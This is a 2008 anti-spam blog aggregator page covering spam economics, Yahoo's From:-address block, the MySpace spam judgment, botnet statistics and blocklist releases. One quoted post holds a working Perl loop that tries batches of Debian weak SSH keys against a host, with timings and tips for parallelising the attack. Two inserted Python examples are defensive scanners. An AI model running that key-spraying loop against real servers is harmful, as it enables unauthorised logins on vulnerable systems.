Planet Antispam
May 16, 2008

Real World Scenarios
Despite all the money invested into anti-spam solutions, spam volume continues to rise. Yes, spamming is an arms race. But the real race is one of sheer volume.
Spammers respond to difficulty by simply sending more spam. Better filtering? Send more to improve numbers getting through. Spamming not profitable enough? Send more spam. Users not interested? Send more variety. With botnets, spammers have a highly scalable delivery infrastructure and are not limited by resources. Unfortunately, it's the receiver of spam that bears the cost of that volume.
The problem is more than just the annoyance of spam. Spam is a big cost to organizations. High spam volumes lead to delays in email delivery and significant over-capacity to handle spikes in volume. Email providers know customers are very sensitive to any delays in the receipt of important email, and any service disruptions by a failure to handle loads can have immediate complaints and ongoing financial impacts.
Delays in email delivery caused by high spam traffic divert IT attention to chase spam.
Ongoing IT workload costs likely dwarf one-time capital expenditures for new systems.
Adding capacity in chunks with each budget period makes it difficult to know if it's too little or too much to scale capacity to meet volumes.
Traffic shaping reduces IT infrastructure and support costs because it removes more spam at the connection level than any other approach.
One of the Fortune 500 companies MailChannels works with has implemented traffic shaping solely to get their infrastructure costs under control. They were being flooded with spam and as a result legitimate email was being crowded out by the spam, resulting in delivery delays of hours at a time. Their spam filters were getting rid of it so the end users didn't see it, but the servers were doing all they could to process backlogged traffic. The company couldn't accept any more mail; they were at their limit in terms of concurrent SMTP connections and were at a loss to come up with a good strategy for dealing with all the spam.
They were using all the blacklists they could find, but even though the blacklists got rid of 50 to 70 percent of spam coming from known spam sources, the spam that got through was significant enough to be a very serious problem for end users and administrators trying to keep the email service flowing.
Implementing email traffic shaping in front of their servers dramatically dropped spam from 70 percent of all processed traffic down to 20 percent overnight; as a result they turned off 4 of the 6 servers they were using to handle all inbound mail. More importantly, they no longer needed to waste time maintaining content filters, adding more servers or experiencing slow SMTP responses.
There are limitations with every anti-spam technology. While filtering is effective at separating spam from email, it is only one layer in a multi-tiered anti-spam architecture designed to leverage various technologies suited to each task. Applying traffic shaping at the network edge ensures legitimate senders get excellent quality of service and their mail flows quickly, while spammers are given very poor quality of service and their mail is not allowed into your network.
Next post: Consequences of traffic shaping
May 16, 2008 05:44 PM
JD Falk of Box of Meat has a post that describes a problem Yahoo had with one of its new email security features. The article states that the problem arose when Yahoo decided to stop any emails going through the servers, which it runs for its partner BT (British Telecom), that did not have a matching BT/Yahoo address in the From: field. People who tried to send using their own domain names found the email did not get sent, and received a confusing message that they had "error 553" and offered a link where they could validate their domain.
The theory behind this is that Yahoo doesn't want spammers spoofing the From: field in messages using their service so they were going to cut everyone off who was doing that. The bad thing is that lots of people do it for legitimate reasons. Back in January of this year, I blogged about outbound spam filtering and listed a bunch of scenarios that we could implement in order to stop it.
One that we examined internally (but I never blogged about) was stopping people from sending mail from (From:) domains that they don't have listed in our admin center. We dropped that idea when we learned that we have piles and piles of clients that do this. One example is real estate agents that send outbound mail through us but have Reply-To's to a Yahoo.com email address, for example. You may be saying "Well, they shouldn't do that." Be that as it may, people do it and we need to work around it. Yahoo's case is a perfect example.
It appears that Yahoo opted for my option 3 that I did post about 4 months ago. Had Yahoo consulted my blog, they would have read that it was a complex option to implement and that it could annoy users to have to click a link to get their message through. I didn't write it at the time, but I should have added that it was far more likely to confuse users than annoy them.
Let this be a lesson for all of us: users are not easily fooled but they are easily confused.
May 16, 2008 04:45 PM
Mahalo Daily: I’m Gonna Git You Spamma!
most songs or videos about spam are insultingly bad, but this one actually has some smart dialogue
(via the email wars)
May 16, 2008 04:40 PM
Email Marketing Reports: The new email marketing: accepting accountability: in part 3 of an ongoing series, Mark Brownlow reminds us that “accountability communicates trust” — and explains some ways to be accountable when sending mail
May 16, 2008 04:26 PM
I don't need a calendar to tell me it's Friday. Phishers let me know by their increased volume on that day (for me anyway). The Friday ones link to hijacked web sites, usually European ones whose owners are just closing up shop for the weekend. It will be Monday before the owners even know they've been hosting criminal activity—by which time the damage will have been done.
May 16, 2008 04:11 PM
Here’s some pretty scary figures from Craig Hughes on the viability of an SSH worm:
when doing this, connecting to localhost:
find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@localhost'"'"'); system("ssh-add -D"); $keys = ""; }'
4.63user 3.06system 0:19.54elapsed
ie about 50 per second
when connecting remotely over the internet (ping RTT is ~60ms):
find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@example.com'"'"'); system("ssh-add -D"); $keys = ""; }'
1.10user 0.60system 0:35.15elapsed
ie about 6 per second over the internet.
Logging of the failures on the server side looks like this:
May 15 10:53:31 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50445;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:32 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50446;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:33 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50447;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:34 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50448;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:35 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50451;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:36 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50452;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:37 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50453;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:39 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50455;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:40 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50456;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:41 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50457;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:42 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50458;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:43 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50459;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
ie it shows the connection attempt, but NOT the failure. It shows
one connection attempt per 7 keys attempted.
So given that:
- RSA is the default if you don’t specify for ssh-keygen
- 99.99% of people use x86
- PID is sequential, and there’s almost certainly an uneven distribution in PIDs used by the keys out there in the wild
then:
Probably there’s about 10k RSA keys which are in some very large
fraction of the (debian-generated) authorized_keys files out there.
These can be attempted in about 1/2 an hour, remotely over the
internet. You can hit the full 32k range of RSA keys in an hour and
a half. Note that the time(1) output shows how little load this puts
on the client machine — you could easily run against lots of target
hosts in parallel; most of the time is spent waiting for TCP
roundtrip latencies. Actually, given that, you could probably
accelerate the attack substantially by parallelizing the attempts to
an individual host so you have lots of packets in flight at any given
time. You could probably easily get up towards the 50/s local number
doing this, which brings time down to about 3-4 minutes for 10k keys,
or 11 minutes for the full 32k keys.
May 16, 2008 03:53 PM
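The defensive counterpart to the key-spraying figures above is to find the weak keys before someone else does: compute the fingerprint of every key in an authorized_keys file and compare it against a blacklist of known-weak fingerprints, which is what Debian's openssh-blacklist tooling did. The following is an added example written for this page, not code from the original post or from Craig Hughes. It builds the ssh-rsa wire blob itself so it runs offline; the two keys, their toy moduli and the blacklist contents are constructed stand-ins, not real Debian-generated keys.

```python
"""
Added example (not part of the original post): scan an OpenSSH authorized_keys
text for keys whose fingerprint appears in a blacklist of known-weak keys.
Key material and blacklist entries below are constructed for the demo; a real
run would load the openssh-blacklist fingerprint files instead.
"""
import base64
import hashlib
import struct


def _ssh_string(data: bytes) -> bytes:
    """SSH wire-format string: uint32 big-endian length followed by payload."""
    return struct.pack(">I", len(data)) + data


def _ssh_mpint(n: int) -> bytes:
    """SSH mpint for a non-negative integer (leading 0x00 kept if the high bit is set)."""
    if n == 0:
        return _ssh_string(b"")
    return _ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def rsa_public_blob(e: int, n: int) -> bytes:
    """The 'ssh-rsa' public key blob exactly as OpenSSH base64-encodes it."""
    return _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)


def parse_blob(blob: bytes) -> dict:
    """Split an ssh-rsa blob into type/e/n; raises ValueError on malformed input."""
    fields, off = [], 0
    while off < len(blob):
        if off + 4 > len(blob):
            raise ValueError("truncated length prefix")
        (length,) = struct.unpack(">I", blob[off:off + 4])
        off += 4
        if off + length > len(blob):
            raise ValueError("field runs past end of blob")
        fields.append(blob[off:off + length])
        off += length
    if len(fields) != 3 or fields[0] != b"ssh-rsa":
        raise ValueError("not an ssh-rsa blob")
    return {"type": fields[0].decode(),
            "e": int.from_bytes(fields[1], "big"),
            "n": int.from_bytes(fields[2], "big")}


def fingerprint_sha256(blob: bytes) -> str:
    """OpenSSH-style SHA256 fingerprint: base64 of the digest, '=' padding stripped."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def fingerprint_md5(blob: bytes) -> str:
    """Legacy colon-separated MD5 fingerprint (the form the Debian-era blacklists used)."""
    return "MD5:" + ":".join(f"{b:02x}" for b in hashlib.md5(blob).digest())


def scan_authorized_keys(text: str, blacklist: set) -> list:
    """One record per key line: (comment, sha256 fingerprint, modulus bits or None, weak?).
    Lines with a leading options field (command="...", from="...") are not handled here."""
    results = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 2)
        if len(parts) < 2:
            raise ValueError(f"malformed line: {line!r}")
        keytype, b64 = parts[0], parts[1]
        comment = parts[2] if len(parts) == 3 else ""
        blob = base64.b64decode(b64, validate=True)
        fp = fingerprint_sha256(blob)
        bits = parse_blob(blob)["n"].bit_length() if keytype == "ssh-rsa" else None
        results.append((comment, fp, bits, fp in blacklist))
    return results


# Constructed sample keys with toy moduli: NOT real RSA keys (real ones are 1024+ bits).
WEAK_KEY = rsa_public_blob(65537, 0xC0FFEE1234567890ABCDEF)
GOOD_KEY = rsa_public_blob(65537, 0xDEADBEEF0BADF00D1337)

SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed authorized_keys for the demo",
    "ssh-rsa " + base64.b64encode(WEAK_KEY).decode() + " deploy@buildbox",
    "ssh-rsa " + base64.b64encode(GOOD_KEY).decode() + " alice@laptop",
])

# Stand-in for the blacklist of weak-key fingerprints (assumed, constructed here).
WEAK_FINGERPRINTS = {fingerprint_sha256(WEAK_KEY)}

if __name__ == "__main__":
    for comment, fp, bits, weak in scan_authorized_keys(SAMPLE_AUTHORIZED_KEYS, WEAK_FINGERPRINTS):
        print(f"{'WEAK' if weak else 'ok  '} {fp} {bits or '?'} bits  {comment}")
```

Fingerprints are taken over the raw blob, so the same key flagged here is flagged whatever comment or options precede it in the file; if you keep a blacklist in MD5 form, swap fingerprint_md5 in for the lookup.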
Security Bytes: Google Docs used in latest spam run: Matt Sergeant describes Google Docs links appearing in spam, intended to fool users into clicking through — proving once again that no online service can assume it’ll stay free of abuse for long
May 16, 2008 02:47 PM
The Guardian: Yahoo downgrades antispam measure after causing BT email chaos:
This seems like something that should have been rolled out in a ‘log only’ mode for a day or two to see how much traffic it would affect.
The idea in general isn’t bad, but they probably should have counted how many different domains a given customer IP address sent as in a day and then only hit the ones that used an abnormally high number.
May 16, 2008 02:19 PM
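The log-only variant suggested above, counting how many distinct From: domains each customer IP used in a day and flagging only the outliers, is easy to prototype. The following is an added example written for this page, not code from the original post, Yahoo or BT. The log line format, the sample log, the threshold values and the RFC 5737 addresses are all constructed for the demonstration.

```python
"""
Added example (not part of the original post): per-IP count of distinct From:
domains per day, flagging only abnormal senders so that a customer with a
second legitimate domain (the Reply-To case) is left alone.
Assumed log format: "<YYYY-MM-DD> <time> ip=<addr> from=<local>@<domain>".
"""
import re
import statistics
from collections import defaultdict

LOG_RE = re.compile(
    r"^(?P<day>\d{4}-\d{2}-\d{2}) \S+ ip=(?P<ip>\S+) from=[^@\s]+@(?P<domain>[^\s>]+)$"
)


def parse_line(line: str):
    """Return (day, ip, domain) for a matching line, None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return m["day"], m["ip"], m["domain"].lower()


def distinct_domains_per_ip(lines) -> dict:
    """Map (day, ip) -> set of From: domains that IP used on that day."""
    seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unrelated log lines are skipped, not fatal
        day, ip, domain = rec
        seen[(day, ip)].add(domain)
    return seen


def flag_outliers(seen: dict, floor: int = 5, ratio: float = 3.0) -> dict:
    """Return {(day, ip): distinct-domain count} for abnormal senders.
    An IP is flagged only when its count is at least `floor` AND at least
    `ratio` times that day's median, so small legitimate multi-domain use
    never trips it. Caveat: if most senders in the sample are abusive the
    median rises with them, so keep `floor` as an absolute backstop."""
    by_day = defaultdict(dict)
    for (day, ip), domains in seen.items():
        by_day[day][ip] = len(domains)
    flagged = {}
    for day, counts in by_day.items():
        threshold = max(floor, ratio * statistics.median(counts.values()))
        for ip, n in counts.items():
            if n >= threshold:
                flagged[(day, ip)] = n
    return flagged


# Constructed sample log: one single-domain customer, one legitimate two-domain
# customer, one more single-domain customer, and one IP spraying nine domains.
SAMPLE_LOG = [
    "2008-05-16 08:00:01 ip=198.51.100.10 from=agent@homes.example",
    "2008-05-16 08:05:12 ip=198.51.100.10 from=agent@homes.example",
    "2008-05-16 09:10:00 ip=198.51.100.11 from=bob@shop.example",
    "2008-05-16 09:11:30 ip=198.51.100.11 from=bob@mail.example",
    "2008-05-16 10:00:00 ip=203.0.113.8 from=carol@carol.example",
] + [
    f"2008-05-16 10:00:{5 + i:02d} ip=203.0.113.7 from=x{i}@bank{i}.example"
    for i in range(9)
] + [
    "2008-05-16 10:01:00 noise line that does not match the format",
]

if __name__ == "__main__":
    seen = distinct_domains_per_ip(SAMPLE_LOG)
    for (day, ip), n in sorted(flag_outliers(seen).items()):
        print(f"{day} {ip}: {n} distinct From: domains, would be rejected")
```

Running this in log-only mode for a day or two, as the post suggests, gives you the real distribution of counts before you pick floor and ratio; with the sample above the median is 1.5, so the threshold is the floor of 5 and only 203.0.113.7 is flagged.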
If you’ve been following the Debian OpenSSL pRNG security debacle, you may have
noticed that there’s a painful problem for people who’ve used a Debian or
Ubuntu system in the process of buying a commercial SSL key — they are in a
situation where those commercially-purchased keys need to be regenerated.
(When an SSL key is obtained from a commercial Certificate Authority, you first
have to generate a Certificate Signing Request on your own machine, then send
that to the CA, who extracts its contents and applies a signature to produce a
valid CA-issued certificate.)
Things are looking up for these victims, though — some smart cookie at Debian came up with these instructions:
SSL Certificate Reissuance
If you paid good money to have a vulnerable key signed by a Certificate
Authority (CA), chances are your CA can re-issue a certificate for free,
provided all information in the CSR is identical to the original CSR. Create a
new key with a non-vulnerable OpenSSL installation, re-create the CSR with the
same information as your original (vulnerable) key’s CSR, and submit it to your
CA according to their reissuance policy:
- GeoTrust: Here (Available throughout the lifetime of the certificate. Tucows/OpenSRS in this case, but the instructions are generic to any GeoTrust client.)
- Thawte: Here (Available throughout the lifetime of the certificate.)
- VeriSign: Unknown
- GoDaddy: Here (Only possible within 30 days of the initial order. GoDaddy calls the process “re-keying”, while they call the act of sending you the same signed certificate as your original order a “reissuance”.)
- ipsCA: Generate a new CSR as if you are purchasing a new certificate, follow through the procedure up until you get to the point where you are required to pay with your credit card. At that point contact support via their email and let them know that you are requesting a revocation and re-issue and include the ticket number of your new CSR request.
- CAcert: This is a cost-free certification authority. Simply revoke your old certificates and add new ones. (The key has to be created on a fixed machine and ONLY the certification request has to be uploaded!) At the moment certificate generation will take some time, as it seems that many users are re-issuing their certificates.
- Digicert: Login to Your account to re-issue (free).
This is slightly incorrect, however (unfortunately for me). While GeoTrust claim to offer free reissuance of all its SSL certificates, they don’t really. Their low-cost RapidSSL certs require that you buy ‘reissue insurance’ for $20 to avail of this, if you need to reissue more than 7 days after the initial purchase. :(
Wiki updated.
May 16, 2008 10:45 AM
Last September MySpace sued ur-spammers Sanford "Spamford" Wallace and Walt "Pickle Jar" Rines for egregious violations of CAN SPAM. Neither responded, so, as was widely reported, earlier this week the court granted a default judgement.
Since they sent a lot of spam, the statutory damages came to an enormous $235 million. Even for Spamford, that's a lot of money.
May 16, 2008 06:11 AM
May 15, 2008
29805 patterns, 11859 right anchor strings, 99415 test IPs.
Contribs from yesterday, some QA, some catchup on old queue. Have been
trying to beef up the right anchor dynamics while pruning some prone to
FPs because they're static or mixed.
Was asked to start tracking couplets (pattern class and tech, taken
together as a sort of meta-identifier); there are three new couplets in
this release ('static/frame', for frame relay, 'static/broadband' for
broadband, and 'static/serial' for serial line).
Note that from 20080304 on, we will be including patterns for the
'outmx' tech type again, these should be understood as known legitimate
mail server naming conventions for their domain and you may wish to
exclude them from your use of the distro.
I've made sure to exclude outmx and webhost regexes from the exim and
postfix flat file distributions, so we should be safe there.
Those using the DNSBL interface will note that a return value of
127.0.2.11 now denotes an 'outmx'. This should not affect users of
the sendmail package, as I've not integrated support for scoring on
that basis into the package. Users of other DNSBL-aware tools should
modify their software, as we'll be adding a lot more of these in the
coming weeks.
Download them here:
sendmail:
http://enemieslist.com/downloads/sendmail_access_db
http://enemieslist.com/downloads/rightanchors
postfix:
http://enemieslist.com/downloads/postfix_regexp_table
http://enemieslist.com/downloads/postfix_regexp_table-20080515
exim:
http://enemieslist.com/downloads/exim_hosts
http://enemieslist.com/downloads/exim_hosts-20080515
May 15, 2008 11:11 PM
- New Sender Best Practices Document
- Exploiting Google MX servers as Open SMTP Relays
- MySpace wins $230 million anti-spam judgment
- Srizbi grows into world's largest botnet
- Exploiting the Trust Hierarchy among Email Servers
- What Google Knows About Spam
- Major career web sites hit by spammers attack
- A reason not to celebrate: Spam turns 30
- Watch out for gas spam scams
- Spam Moves to Cellphones and Gets More Invasive
- A Guardian Angel In Your Cell Phone
- Proud Managers Verdict On Spam
- Finding God in your inbox? Spam goes spiritual
- MySpace tells AP it has won $234M spam judgment
- E-mail spam on the rise, officials offer tips
- Cybercrime expert comes to SA
- Researchers See Gmail "Spam And Phishing Threat"
- Blondie and Spam - 30 year Annoversaries
- Steering Between Unsocial Networks and Social Spam
- McAfee releases results of its Global SPAM experiment
- What's Considered Spam On Twitter?
- Google on Spam: Best 10 Minute SEO Video Ever Made
- Spam turns 30
- FTC Clarifies Single Sender CAN-SPAM Rule
- Security Hole Turns Gmail Into a Spam Machine
- China Unicom Sued Over SMS Spam
- Loose Cannon: Spam @ 30
- Srizbi sending half the world's spam
- Spam turns 30, India high on spammer target
- Turning Spam Into Entertainment
- Backscatter Spam Spreading, Bouncemail Battle Heats Up
- Spam is 30-years-old and growing stronger
- Spam Turns the Big 3-0
- FTC Tightens Up CAN-SPAM Rules
- Spam & Hackers Web Site Flap Prompts Alaska Democrat To Give Up ...
- Right Click Acquires Cutting-Edge Virus and Spam Filtering Software
- FTC Approves New Rule Provision Under The CAN-SPAM Act
- Students Spam State Capitol To Keep Ax From Falling
- Spam's Birthday, the Bionic Dolphin, and More
- 30 years of spam
- Astaro Blocks Growing Backscatter Spam
- Spam more creative, better targeted
- First Caller-ID Spoofers Punished
- Marshal claims one botnet accounts for half of all spam
- MySpace says it has won $234M spam judgment
- Storm clouds gather again
- Mobile Spam Problem in UK
- Gas Savings Spam Fills Inboxes
- Neddy The Racehorse Receives Tasteless Spam Email
- Phishing grows as NDR spam tapers off
- Do not call, do not spam, do not mail
- Educator takes part in e-mail spam study
- 20 registrars control 90% of illicit domains, says Knujon
- Back-scatter spam tacked by Astaro
- Website of the Day: Innocent Spam
- Maxis offers anti-spam service for cellphones
- [ TECHNOLOGY ]: Some tips on how to stay one step ahead of the ...
- Happy 30th birthday, spam.
- Park seeks FBI probe after text messages swamp switchboard with ...
- Stop Spam. Publish Books
- OS X Security: How I became a spam kingpin, went legit and turned ...
- Spam filters become lore
- Happy birthday spam, but no returns please
- Spam More Creative, Better Targeted
- Gmail Security Flaw Spotted, Spam Filters Subverted
- Spam Filtering For Small/Medium Business?
- Gmail As Open-Relay Spam Server
- Gmail Flaw Could Enable Spam
- Gasoline spam hits inboxes
- Feds Tackle Mobile Spam
- When ghosts spam
- Gmail can be used as 'Spam Bazooka'
- McAfee, Yahoo! Partner for Safe Searching
- International anti-spam laws?
May 15, 2008 11:11 PM
Terry Zink: Sample stats on botnets: interesting stats on botnet sizes & activities, as seen from Hotmail
May 15, 2008 07:45 PM
My piece at the "new" Industry Standard is finally up, with additional additions from Ian Lamont.
"These are the blogs you won't see on the Techmeme Leaderboard, Technorati's Top 100 blogs, or the CrunchBase BloggerBoard ... at least not yet. They include VCs, entrepreneurs, coders, experts, and observers, and they bring a delicious mix of insight, experience, and passion to their blogs. While they may not have the right amount of link love, they need to be on your radar screens."

May 15, 2008 07:55 PM
A few months ago there was a research presentation presented on computer security. It touched upon botnets and the presenter gave some data. Below are some summary results based on a 9-day down-sampled spam trace from Hotmail.
- There were 294 botnets detected, about 460,000 individual bots. This is about 1600 bots per botnet. That's smaller than I thought.
- 50% contained over 1000 machines.
- 80% use less than half of the bots in their network each time. This must be an attempt to reuse botnets so they limit the resources in order to keep them off of blocklists.
- Large botnets send fewer spam messages per bot. This is intuitively obvious.
- 60% of botnet-related spam is from long-lived botnets. Our own individual stats confirm this; we have a private blocklist where there is a core group of IPs that never go away.
- 50% contain machines from >30 countries. I have no information on what countries are the worst offenders.
One day we plan to start combing through our own data to see if we can find even more granular detail on spammers and their botnets.
May 15, 2008 06:08 PM
Joho the Blog: Jonathan Zittrain: David Weinberger’s live recap of a talk in which Jonathan Zittrain discusses the balance between the openness which let the early internet grow and experiment and thrive, and the need for security on the modern result
May 15, 2008 04:23 PM
So, I happened upon the Wikipedia page about the Miss World pageant and noticed that it had a list of winners by country. For example, India has won Miss World 5 times. But, of course, India has a very large population so you'd expect it to be able to churn out a few beauties. So, to get a better idea here is a population adjusted list of countries that have won Miss World:
| Country | Wins | Pop. | Wins/Pop. | Normalized |
|---|---|---|---|---|
| Bermuda | 1 | 66163 | 0.0000151141876879827 | 100.00% |
| Iceland | 3 | 316252 | 0.00000948610601672084 | 62.76% |
| Grenada | 1 | 110000 | 0.00000909090909090909 | 60.15% |
| Guam | 1 | 173456 | 0.00000576515081634536 | 38.14% |
| Jamaica | 3 | 2651000 | 0.000001131648434553 | 7.49% |
| Trinidad and Tobago | 1 | 1305000 | 0.000000766283524904215 | 5.07% |
| Sweden | 3 | 9182927 | 0.000000326693221017656 | 2.16% |
| Puerto Rico | 1 | 3994259 | 0.000000250359328225836 | 1.66% |
| Austria | 2 | 8316487 | 0.000000240486157195941 | 1.59% |
| Ireland | 1 | 4339000 | 0.000000230467849734962 | 1.52% |
| Finland | 1 | 5308208 | 0.000000188387493481793 | 1.25% |
| Venezuela | 5 | 28199822 | 0.000000177306083705067 | 1.17% |
| Israel | 1 | 7282000 | 0.000000137324910738808 | 0.91% |
| Netherlands | 2 | 16408557 | 0.000000121887622415548 | 0.81% |
| Dominican Republic | 1 | 9760000 | 0.000000102459016393443 | 0.68% |
| Czech Republic | 1 | 10381130 | 0.0000000963286270377117 | 0.64% |
| Australia | 2 | 21290000 | 0.0000000939408172851104 | 0.62% |
| Greece | 1 | 11216708 | 0.0000000891527175353054 | 0.59% |
| Peru | 2 | 28674757 | 0.0000000697477575834383 | 0.46% |
| UK | 4 | 60487300 | 0.0000000661295842267716 | 0.44% |
| Argentina | 2 | 40301927 | 0.0000000496254186555397 | 0.33% |
| South Africa | 2 | 43700000 | 0.000000045766590389016 | 0.30% |
| Poland | 1 | 38518241 | 0.0000000259617255107781 | 0.17% |
| France | 1 | 64473140 | 0.0000000155103350015216 | 0.10% |
| Turkey | 1 | 70586256 | 0.0000000141670639111387 | 0.09% |
| Egypt | 1 | 80335036 | 0.0000000124478689472424 | 0.08% |
| Germany | 1 | 82210000 | 0.0000000121639703199124 | 0.08% |
| Russia | 1 | 142008838 | 0.00000000704181524251329 | 0.05% |
| Nigeria | 1 | 148000000 | 0.00000000675675675675676 | 0.04% |
| US | 2 | 304072000 | 0.00000000657738956562919 | 0.04% |
| Brazil | 1 | 186757608 | 0.00000000535453420457174 | 0.04% |
| India | 5 | 1132446000 | 0.00000000441522156464856 | 0.03% |
| China | 1 | 1321851888 | 0.000000000756514409124179 | 0.01% |
So, far and away, the top three are Bermuda, Iceland and Grenada. Given that Bermuda is the winner, and a tax-haven, and has a sub-tropical climate... Hamilton here I come!
May 15, 2008 08:35 AM
29671 patterns, 11864 right anchor strings, 99326 test IPs.
Contribs from the past couple days, some QA, some catchup on old queue.
Have been trying to beef up the right anchor dynamics while pruning some
prone to FPs because they're static or mixed.
Was asked to start tracking couplets (pattern class and tech, taken
together as a sort of meta-identifier); there is one new couplet in
this release ('webhost/exim').
Note that from 20080304 on, we will be including patterns for the
'outmx' tech type again, these should be understood as known legitimate
mail server naming conventions for their domain and you may wish to
exclude them from your use of the distro.
I've made sure to exclude outmx and webhost regexes from the exim and
postfix flat file distributions, so we should be safe there.
Those using the DNSBL interface will note that a return value of
127.0.2.11 now denotes an 'outmx'. This should not affect users of
the sendmail package, as I've not integrated support for scoring on
that basis into the package. Users of other DNSBL-aware tools should
modify their software, as we'll be adding a lot more of these in the
coming weeks.
Download them here:
sendmail:
http://enemieslist.com/downloads/sendmail_access_db
http://enemieslist.com/downloads/rightanchors
postfix:
http://enemieslist.com/downloads/postfix_regexp_table
http://enemieslist.com/downloads/postfix_regexp_table-20080514
exim:
http://enemieslist.com/downloads/exim_hosts
http://enemieslist.com/downloads/exim_hosts-20080514
May 15, 2008 01:30 AM
May 14, 2008
Accused spammer Sanford Wallace has been sued... again. And he has had a major judgment made against him... again. This time, it's to the tune of $230 million.
From the Associated Press:
NEW YORK (AP) - A notorious "Spam King" and his partner now owe MySpace about $230 million in damages after a federal judge awarded the popular online hangout what is believed to be the largest anti-spam judgment ever. The judgment is a big victory for MySpace, although service providers often have a tough time collecting such awards. But even if the News Corp owned site never collects, it hopes the judgment deters other spammers.
"Anybody who's been thinking about engaging in spam are going to say, 'Wow, I better not go there,'" MySpace's chief security officer, Hemanshu Nigam, told The Associated Press on Tuesday. "Spammers don't want to be prosecuted. They are there to make money. It's our job to send a message to stop them."
Nigam told the AP that Wallace and Rines created their own MySpace accounts or took over existing ones by stealing passwords through "phishing" scams.
They then e-mailed other MySpace members, he said, "asking them to check out a cool video or another cool site. When you (got) there, they were making money trying to sell you something or making money based on hits or trying to sell ring tones."
MySpace said the pair sent more than 730,000 messages to MySpace members, many made to look like they were coming from trusted friends, giving them an air of legitimacy. Under the 2003 federal anti-spam law known as CAN-SPAM, each violation entitles MySpace to $100 in damages, tripled when conducted "willfully and knowingly."
Another spammer gets sued, but it's questionable whether or not this will have any sort of deterrent in the spam community. MySpace will have to attempt to collect payment on this guy to actually shut him down. In addition, while breaking into MySpace and stealing passwords is illegal, many other spammers simply use botnets to deliver their payload of spam. In other words, they spam the internet by using means that are much more difficult to track down.
Still, if you are a spammer and start to get a reputation as being a big-time spammer, you are painting a target on your back. Eventually, a bigger fish (like Microsoft or News Corp) will come and eat you. Then the rest of us who fight spam will get to enjoy a little schadenfreude.
May 14, 2008 07:54 PM
Not specifically email related but close enough.
ZDnet has a blog entry talking about Craigslist’s claim of phishing by eBay against them.
As a part of the ongoing legal drama between eBay and Craigslist, Craigslist has now sued eBay. Among their claims is something they are calling phishing attacks. In reality it looks like what they are talking about is a very misleading Google ad.
While I certainly think there's something unappetizing about these advertising practices, I am not sure it qualifies as phishing. I guess this would come down to whether they intended to deceive users who thought they were going to Craigslist.
Did eBay cross a legal line here? Is this just slimy behavior, or is it legitimate search advertising? I’m leaning towards slimy. What about you?
May 14, 2008 06:48 PM
Terry Zink: Hard to see, the future is: a fine summary of the difficulties of measuring anti-spam effectiveness
May 14, 2008 03:53 PM
About 15 months ago I started work on a project that measures our spam effectiveness. Just last week the first part of it finally went live, end-to-end. It was a long time coming but we finally got it done. If you're wondering what took so long, let me tell you:
- We need a source of spam.
- We need to capture it.
- We have to avoid interfering with legitimate mail delivery.
- We need to log the data.
- We need to adhere to privacy requirements.
- We need to create an isolated network within our network to actually do the filtering.
- We need to display the data afterwards.
None of those things is trivial because while the network is designed to mimic our existing filtering infrastructure, there are lots and lots of small differences. A pile of small differences adds up to a major engineering challenge.
Anyhow, the project originally started off as how to gauge our spam catch rate and false positive rate. As we started going along, it became clear to me that I had to scale back my expectations, and I started concentrating on how to measure spam. Fancy charts, training the filter on false negatives, measuring false positives, post-examination, correlation between filters on missed messages... all of this stuff is cool but I had to first get up the first rung on the ladder.
Now that we're looking at part 2, measuring our false positive rate, lots and lots of questions are popping up. How do we measure ourselves against our competition? How do we improve our effectiveness? How do we leverage this network? How do we correlate different false positives and false negatives across different filters? In other words, we now have some visibility and questions are arising about what this thing will look like at the end.
The truth is that I haven't completely thought everything through, I only have a rough outline. George Lucas has stated, of the Star Wars prequels, that when he wrote the stories back in 1975, he had a pretty good idea of what they would all look like. While he didn't have all the details ironed out the three new movies pretty much adhered to his basic storyline.
